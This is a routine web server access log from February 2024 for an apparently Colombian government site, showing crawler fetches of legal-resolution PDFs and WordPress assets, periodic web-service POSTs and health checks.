66.249.66.20 - - [17/Feb/2024:05:34:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3867.pdf HTTP/1.1" 200 1233173
66.249.66.20 - - [17/Feb/2024:05:34:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20801%20AL%20900/RESOLUCION%200811%20DE%202007.pdf HTTP/1.1" 200 280492
66.249.66.21 - - [17/Feb/2024:05:34:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1888.pdf HTTP/1.1" 200 764804
66.249.66.19 - - [17/Feb/2024:05:35:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8105.pdf HTTP/1.1" 200 487103
172.22.2.4 - - [17/Feb/2024:05:34:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:05:35:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
216.245.221.92 - - [17/Feb/2024:05:37:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:05:37:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
52.167.144.212 - - [17/Feb/2024:05:38:37 -0500] "GET /portaldeninos/parque-mirador-de-los-nevados/ HTTP/1.1" 200 89855
201.245.192.253 - - [17/Feb/2024:05:39:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37032
201.245.192.253 - - [17/Feb/2024:05:39:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36627
201.245.192.253 - - [17/Feb/2024:05:39:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38163
52.167.144.6 - - [17/Feb/2024:05:39:31 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
157.55.39.55 - - [17/Feb/2024:05:39:34 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
157.55.39.55 - - [17/Feb/2024:05:39:36 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
157.55.39.55 - - [17/Feb/2024:05:39:37 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
157.55.39.55 - - [17/Feb/2024:05:39:37 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
157.55.39.55 - - [17/Feb/2024:05:39:37 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
157.55.39.55 - - [17/Feb/2024:05:39:38 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
207.46.13.54 - - [17/Feb/2024:05:39:39 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
207.46.13.54 - - [17/Feb/2024:05:39:40 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
207.46.13.54 - - [17/Feb/2024:05:39:41 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
207.46.13.54 - - [17/Feb/2024:05:39:41 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
207.46.13.54 - - [17/Feb/2024:05:39:42 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
207.46.13.54 - - [17/Feb/2024:05:39:42 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
52.167.144.212 - - [17/Feb/2024:05:39:47 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
52.167.144.212 - - [17/Feb/2024:05:39:47 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
52.167.144.212 - - [17/Feb/2024:05:39:47 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
52.167.144.212 - - [17/Feb/2024:05:39:47 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
52.167.144.212 - - [17/Feb/2024:05:39:48 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
52.167.144.212 - - [17/Feb/2024:05:39:48 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
52.167.144.212 - - [17/Feb/2024:05:39:48 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
52.167.144.212 - - [17/Feb/2024:05:39:48 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
40.77.167.79 - - [17/Feb/2024:05:39:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
40.77.167.79 - - [17/Feb/2024:05:39:56 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
40.77.167.79 - - [17/Feb/2024:05:39:56 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
40.77.167.79 - - [17/Feb/2024:05:39:56 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
40.77.167.79 - - [17/Feb/2024:05:39:56 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
40.77.167.79 - - [17/Feb/2024:05:39:56 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
201.245.192.253 - - [17/Feb/2024:05:40:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36627
66.249.66.20 - - [17/Feb/2024:05:40:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0291.pdf HTTP/1.1" 200 562301
172.22.2.4 - - [17/Feb/2024:05:40:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.19 - - [17/Feb/2024:05:41:47 -0500] "GET /resoluciones/RESOLUCIONES%202009/7425.pdf HTTP/1.1" 404 1018
216.245.221.92 - - [17/Feb/2024:05:42:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:05:42:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
172.22.2.4 - - [17/Feb/2024:05:40:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
66.249.66.20 - - [17/Feb/2024:05:43:04 -0500] "GET /BLA/resoluciones/Autos%202008/1005.pdf HTTP/1.1" 200 77248
172.22.2.4 - - [17/Feb/2024:05:43:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63095
172.22.2.4 - - [17/Feb/2024:05:44:48 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%209%20del%2021%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 1402289
66.249.66.19 - - [17/Feb/2024:05:44:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/0295.pdf HTTP/1.1" 304 -
66.249.66.38 - - [17/Feb/2024:05:46:44 -0500] "GET /las-tres-caminatas-para-cerrar-el-ano-entre-la-naturaleza.html HTTP/1.1" 304 -
216.245.221.92 - - [17/Feb/2024:05:47:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:05:47:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
172.22.2.4 - - [17/Feb/2024:05:45:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.20 - - [17/Feb/2024:05:47:43 -0500] "GET /Publicaciones/2023EE297159.pdf HTTP/1.1" 404 228
40.77.167.25 - - [17/Feb/2024:05:48:18 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8397
208.131.166.46 - - [17/Feb/2024:05:48:21 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [17/Feb/2024:05:46:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
216.245.221.92 - - [17/Feb/2024:05:52:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Feb/2024:05:52:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
108.174.5.112 - - [17/Feb/2024:05:52:44 -0500] "GET /images/acuerdos-c1_optimized.jpg HTTP/1.1" 200 228032
172.22.2.4 - - [17/Feb/2024:05:51:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.192 - - [17/Feb/2024:05:54:09 -0500] "GET /portaldeninos/relatos-urbanos-de-los-ecosistemas-bogotanos-2/ HTTP/1.1" 200 88374
172.22.2.4 - - [17/Feb/2024:05:52:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
40.77.190.5 - - [17/Feb/2024:05:56:02 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
201.245.192.253 - - [17/Feb/2024:05:57:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
216.245.221.92 - - [17/Feb/2024:05:57:08 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:05:57:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:05:58:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
201.245.192.253 - - [17/Feb/2024:06:02:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
216.245.221.92 - - [17/Feb/2024:06:02:08 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:06:03:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:06:04:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
157.55.39.60 - - [17/Feb/2024:06:06:00 -0500] "GET /documents/10184/4893230/Llantaton-2023.jpg/c7c411c8-aa83-4a51-bddf-810113921ffe?t=1686265128313 HTTP/1.1" 404 1034
201.245.192.253 - - [17/Feb/2024:06:07:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
216.245.221.92 - - [17/Feb/2024:06:07:08 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.21 - - [17/Feb/2024:06:07:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2300.pdf HTTP/1.1" 200 803943
52.167.144.136 - - [17/Feb/2024:06:08:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/1616.pdf HTTP/1.1" 304 -
172.22.2.4 - - [17/Feb/2024:06:10:03 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [17/Feb/2024:06:10:03 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [17/Feb/2024:06:10:03 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [17/Feb/2024:06:10:03 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [17/Feb/2024:06:10:03 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [17/Feb/2024:06:10:03 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [17/Feb/2024:06:10:03 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [17/Feb/2024:06:10:03 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [17/Feb/2024:06:10:03 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [17/Feb/2024:06:10:03 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [17/Feb/2024:06:10:03 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
205.210.31.192 - - [17/Feb/2024:06:10:53 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Feb/2024:06:09:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Feb/2024:06:11:04 -0500] "GET /BLA/boletinlegal/remote/login HTTP/1.1" 404 1018
172.22.2.4 - - [17/Feb/2024:06:10:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
201.245.192.253 - - [17/Feb/2024:06:12:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40533
216.245.221.92 - - [17/Feb/2024:06:12:08 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.20 - - [17/Feb/2024:06:13:18 -0500] "GET /BLA/resoluciones/AUTOS%202007/3659.pdf HTTP/1.1" 200 142523
186.102.64.138 - - [17/Feb/2024:06:13:24 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19JF37O27bnU6Yd3qi8DWEjDmmC6yfdx99HSBpCBr2Mpk9I4OelCm7J&y=U2FsdGVkX196HstvmMHml+zTfWMEi5EJIH2VkGC/rmkx+fj3Vj3r2D9fMrckSrTO HTTP/1.1" 200 30
